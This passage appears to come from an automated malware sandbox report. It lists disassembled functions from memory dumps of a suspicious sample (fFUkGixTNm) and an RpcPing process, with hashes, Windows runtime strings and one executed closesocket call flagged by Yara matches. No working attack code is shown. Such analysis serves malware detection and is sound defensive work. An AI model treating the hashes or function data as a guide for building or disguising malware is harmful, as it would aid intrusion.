                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 27ece9a823ad5a81a59dcbbd24d2ab80b3baa60126ec96cae96b1032561ee25a
                                  • Instruction ID: 641e29a045c0c32fbf24e09076f643cd306ce21500efb902b4ff937d0bef2da9
                                  • Opcode Fuzzy Hash: 27ece9a823ad5a81a59dcbbd24d2ab80b3baa60126ec96cae96b1032561ee25a
                                  • Instruction Fuzzy Hash: 34513A35600359BEDF10EB65DD85FAEB3BDEF89304F04009BE515AB281D7729A418F50
                                  Function 03AE6940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                  • Instruction ID: fd10b46b74f295506d72cd757f7dd0bed9d5fb5fa19fd71e380c79d67a82e0c5
                                  • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                  • Instruction Fuzzy Hash: A0021275508341AFC308CF18C990A6BBBF5EFD8710F448A2EB9999B264DB31E905CB52
                                  Function 03A5B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                  • Instruction ID: e65521cfad967e832f62ad34c0f5189c9cad8891bd3f44865d327fb93ecbcdcd
                                  • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                  • Instruction Fuzzy Hash: AC817C74E062499EDF28CF68C8917AEBBB6AF46312F1C415FFC61A7791C63499408B70
                                  Function 03AC20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: ba340a58c089d7f5d483979fb890e651a032fc155367b4e895fb30214bcd6501
                                  • Instruction ID: 8521e5b2ea82df80e97eafecca9e27bf22bcf10828a961424e75029e254256e2
                                  • Opcode Fuzzy Hash: ba340a58c089d7f5d483979fb890e651a032fc155367b4e895fb30214bcd6501
                                  • Instruction Fuzzy Hash: 9A216276A10259ABCF11EF79DD40AEEB7F8EF54644F08052FE905E7240E730DA018BA1
                                  Function 03A3F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 03A802BD
                                  • RTL: Re-Waiting, xrefs: 03A8031E
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 03A802E7
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  • Opcode ID: ea68fa4d8bf07f7cd986f175d250fe63c385e9d8d145e8519f068219707f1af8
                                  • Instruction ID: 999a6a80eae4d108e482b1fade293641a98e0a6113b300a8586ee5b943a08a21
                                  • Opcode Fuzzy Hash: ea68fa4d8bf07f7cd986f175d250fe63c385e9d8d145e8519f068219707f1af8
                                  • Instruction Fuzzy Hash: 88E1A031A14741AFD725DF28C984B2AB7E0FB86324F180A5EF5A58B3E1D774D948CB42
                                  Function 03A4BED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Resource at %p, xrefs: 03A87B8E
                                  • RTL: Re-Waiting, xrefs: 03A87BAC
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 03A87B7F
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  • Opcode ID: 94951f9993f33d44fa256b8605c1e59cbf46bb947998624c947bf7c93da863b0
                                  • Instruction ID: 16dfbe61a1931b459b35d8e55198b3291dd66f8582ef41ab36790b90dd62cc2f
                                  • Opcode Fuzzy Hash: 94951f9993f33d44fa256b8605c1e59cbf46bb947998624c947bf7c93da863b0
                                  • Instruction Fuzzy Hash: 1C41B1353047029FD724DF29C941B6AB7E5EFC8710F140A1FE99ADB680DB31E8058BA1
                                  Function 03A4B4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                  Download Yara Rule
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A8728C
                                  Strings
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 03A87294
                                  • RTL: Resource at %p, xrefs: 03A872A3
                                  • RTL: Re-Waiting, xrefs: 03A872C1
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  • Opcode ID: c2a7c092cc716e2bccd304be703f9abf0abbb75c3daf012c5e1f67bbcdf465a5
                                  • Instruction ID: c64b7830f94101bfadd12f92affe1457a1a326bf2fb8f1726a772212873bc512
                                  • Opcode Fuzzy Hash: c2a7c092cc716e2bccd304be703f9abf0abbb75c3daf012c5e1f67bbcdf465a5
                                  • Instruction Fuzzy Hash: EE41E335600206AFD724EF24CD41B6AB7A5FB94710F24061AF995EB240EB31E85187E1
                                  Function 03AC2300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  • Opcode ID: 2cbb01aee4f831c912993f876b7f970db465ce5db74473a4cc104feeba27155d
                                  • Instruction ID: 64763e54e6f7f3802f1bc7b432f471e80903bd9101082e65a9ee51263e88fb8b
                                  • Opcode Fuzzy Hash: 2cbb01aee4f831c912993f876b7f970db465ce5db74473a4cc104feeba27155d
                                  • Instruction Fuzzy Hash: 8F316676A102599FDF20DF29DD40BEEB7B8EB44610F44459FE849E7340EB309A54CBA0
                                  Function 03A57D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                  • Instruction ID: e60a12600d42fa943460c0e57e2713d891f8de539d418144ba35294e1d916ed7
                                  • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                  • Instruction Fuzzy Hash: D4919D71E4031A9ADB24DF69C880ABEB7A5AF44320F58461FFC65F7280E6369940CB60
                                  Function 03A19126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2931252237.00000000039E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 039E0000, based on PE: true
                                  • Associated: 00000008.00000002.2931252237.0000000003B09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.2931252237.0000000003B7E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_39e0000_RpcPing.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $$@
                                  • API String ID: 0-1194432280
                                  • Opcode ID: 50bc04c3fbfff7052cec08c680b49e30fcb964b71c7c4ab6fb238b22e2241a67
                                  • Instruction ID: a4e3bf59230ef2d2202118d40fbceeacb9cb29b1f84e17c311f9496ba37b975a
                                  • Opcode Fuzzy Hash: 50bc04c3fbfff7052cec08c680b49e30fcb964b71c7c4ab6fb238b22e2241a67
                                  • Instruction Fuzzy Hash: 41813875D002699BDB75DB54CD44BEEB7B8AB08750F0445EBA90AB7280E7309E84CFA0

                                  Execution Graph

                                  Execution Coverage:2.7%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:3
                                  Total number of Limit Nodes:0
                                  execution_graph 12256 58e7099 12257 58e70b6 12256->12257 12258 58e70c5 closesocket 12257->12258

                                  Executed Functions

                                  Function 058E7099 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 24 58e7099-58e70d3 call 58bf169 call 58e7c79 closesocket
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.2932524352.0000000005870000.00000040.80000000.00040000.00000000.sdmp, Offset: 05870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_5870000_fFUkGixTNm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: 797bc2e897e9f15d747c2332ec9e493d8587a25c208b171719e07a6b5cd29495
                                  • Instruction ID: e08110bc03fbf50e463d388c3463aace39c9fde13298672c3bef6a39890637c8
                                  • Opcode Fuzzy Hash: 797bc2e897e9f15d747c2332ec9e493d8587a25c208b171719e07a6b5cd29495
                                  • Instruction Fuzzy Hash: D8E04636204614BBE210AAAADC04CDBB36DDBC5310B008416FE08AB200CAB1A9118BF2